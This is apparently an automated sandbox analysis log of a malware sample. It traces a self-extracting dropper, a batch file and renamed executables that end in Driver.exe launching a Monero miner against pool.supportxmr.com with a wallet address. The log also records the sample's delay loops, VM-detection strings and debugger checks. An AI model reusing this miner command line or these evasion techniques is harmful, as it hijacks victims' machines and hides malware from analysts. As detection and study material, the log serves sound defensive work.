                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 582500
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 582359
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 582203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 582070
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 581922
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 581781
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 581625
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 581490
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 581344
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 581203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 581086
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 580945
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 580797
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 580656
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 580526
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 580400
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 580258
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 580109
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 579984
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 579844
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 579708
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 579547
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 579424
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 579297
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 579160
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 579005
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 578868
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 578731
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 578578
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 578449
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 578322
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 578186
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 578060
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577934
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577804
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577659
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577515
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577368
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577234
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577078
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576960
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576781
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576651
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576499
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576344
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576187
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576054
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575890
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575765
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575634
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575487
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575218
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575078
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574951
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574812
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574681
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574531
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574394
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574258
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574078
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573920
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573781
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573646
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573510
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573362
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573219
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573064
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572922
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572791
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572659
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572500
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572377
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572236
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572107
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571980
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571844
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571712
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571578
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571422
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571285
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571154
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571026
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570875
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570760
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570616
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570471
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570182
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570047
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569891
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569750
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569594
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569464
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568922
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568756
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568620
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568469
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568198
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568071
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567937
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567801
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567668
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567531
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567404
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567275
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567140
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567000
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566844
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566687
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566553
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566410
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566265
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566109
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565997
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565866
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565718
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565588
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565462
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565342
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565084
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564946
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564812
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564686
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564547
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564406
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564277
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564140
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563984
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563844
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563703
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563515
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563375
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563250
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563109
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562966
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562836
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562656
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562500
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562359
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562211
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562079
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561935
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561797
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561640
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561493
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561348
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561210
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560930
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560804
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560625
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560453
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560305
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560140
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560015
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559858
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559727
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559578
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559462
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559321
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559163
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559015
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558889
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558757
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558594
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558451
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558315
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558166
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558015
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557875
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557742
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557605
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557471
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556943
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556811
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556684
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556500
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556354
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556219
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555931
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555797
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555686
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555529
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555364
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555219
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555085
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554984
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554874
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554765
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554656
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554547
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554437
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554218
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554109
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554000
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 553890
                  Source: yondex.exe, 00000010.00000002.2078023895.00000000013C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                  Source: Driver.exe, 0000000A.00000002.2583502346.00000000005E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
                  Source: Driver.exe, 0000001D.00000002.4172854345.0000000000491000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW_9
                  Source: Driver.exe, 00000015.00000002.3029846124.00000000005D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW$}T
                  Source: Driver.exe, 00000005.00000002.1804831542.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 0000000A.00000002.2583502346.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 00000015.00000002.3029846124.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 00000019.00000002.3336155249.0000000000611000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 0000001D.00000002.4172854345.0000000000491000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: Driver.exe, 0000000A.00000002.2583502346.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 00000019.00000002.3336155249.0000000000611000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWws\System32\en-US\wshqos.dll.mui
                  Source: yondex.exe, 00000004.00000002.1854091999.0000000001131000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll <;2?
                  Source: rolex.exe, 00000003.00000002.2047592376.000001FEA81E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: Driver.exe, 00000005.00000002.1804831542.0000000000485000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWA
                  Source: yondex.exe, 0000000C.00000002.1975490688.0000000000A72000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeCode function: 4_2_013F2E9E LdrInitializeThunk,4_2_013F2E9E
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559576D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6559576D8
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655960D20 GetProcessHeap,0_2_00007FF655960D20
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF6559576D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6559576D8
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655953170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF655953170
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655952510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF655952510
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF655953354 SetUnhandledExceptionFilter,0_2_00007FF655953354
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4C2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF7AB4C2510
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4C3354 SetUnhandledExceptionFilter,3_2_00007FF7AB4C3354
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4C3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF7AB4C3170
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4C76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF7AB4C76D8
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeMemory allocated: page read and write | page guard
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeCode function: 0_2_00007FF65594B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65594B190
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe rolex.exe -priverdD
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe"
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 7280 -ip 7280
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7280 -s 764
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7280 -s 764
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7440 -s 552
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 548 -p 7424 -ip 7424
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7424 -s 876
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 508 -p 1712 -ip 1712
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1712 -s 864
